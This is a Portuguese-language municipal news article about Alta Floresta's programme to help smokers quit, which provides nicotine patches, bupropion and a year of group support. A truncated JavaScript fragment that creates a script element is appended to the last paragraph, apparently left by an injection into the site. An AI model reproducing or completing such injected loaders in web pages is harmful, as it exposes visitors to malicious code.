Capa / Em Destaque / Programa de Combate ao Tabagismo será implantado nas UBS’s de Alta Floresta

Programa de Combate ao Tabagismo será implantado nas UBS’s de Alta Floresta

TabagismoAssessoria da PMAF

Em 2016, a Prefeitura de Alta Floresta, por meio da Secretaria Municipal de Saúde, dará continuidade aos trabalhos do Programa de Combate ao Tabagismo nas Unidades Básicas de Saúde (UBS’s) do município. O objetivo do programa é atender as pessoas que tem interesse em parar de fumar, seja por uso de medicamentos ou pela participação de atividades terapêuticas desenvolvidas em grupos.
Conforme avaliação da intensidade do vício, o paciente receberá adesivos transdérmicos de 21, 14 e 7 mg e o medicamento Bupropiona (comprimido), auxílio no tratamento de ansiedade e outros sintomas que poderá apresentar durante o período de abstinência.
Caso necessário, os pacientes receberão todo suporte medicamentoso, que serão utilizados nos três primeiros meses, e em todo o período de 12 meses haverá atendimento individual e em grupo, além das orientações quanto às medidas que deverão ser adotadas pelos participantes após o tratamento.
“Este programa é formado por grupos de pessoas selecionadas pela Unidade de Saúde, onde se fará um cadastro a partir dos casos mais graves de dependência. Contudo, além do interesse por parte do paciente, ele deverá ter muita persistência para não desistir, pois, o período para conclusão do tratamento é de um ano”, declarou Claudiomiro Vieira, coordenador do programa.
A principal meta será estender este trabalho para todos PSF’s do município de Alta Floresta até o final do ano.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top